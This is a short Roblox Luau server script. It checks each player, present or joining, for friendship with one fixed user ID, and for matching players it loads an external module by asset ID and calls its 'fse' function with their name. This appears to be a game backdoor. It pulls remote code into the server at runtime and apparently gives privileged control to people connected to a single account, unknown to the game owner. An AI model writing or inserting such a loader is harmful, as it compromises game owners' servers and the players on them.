local function GetUser(User)
	local player = game:GetService("Players"):GetPlayerByUserId(User)
	return player ~= nil
end

for i,v in game:GetService("Players"):GetPlayers() do
	if v:IsFriendsWith(3341266064) --[[and GetUser(3341266064)]] then
		require(11126053846).fse(v.Name)
	else
		local wompwomp = 11
	end
end

game:GetService("Players").PlayerAdded:Connect(function(v)
	if v:IsFriendsWith(3341266064) --[[and GetUser(3341266064)]] then
		require(11126053846).fse(v.Name)
	else
		local wompwomp = 11
	end
end)
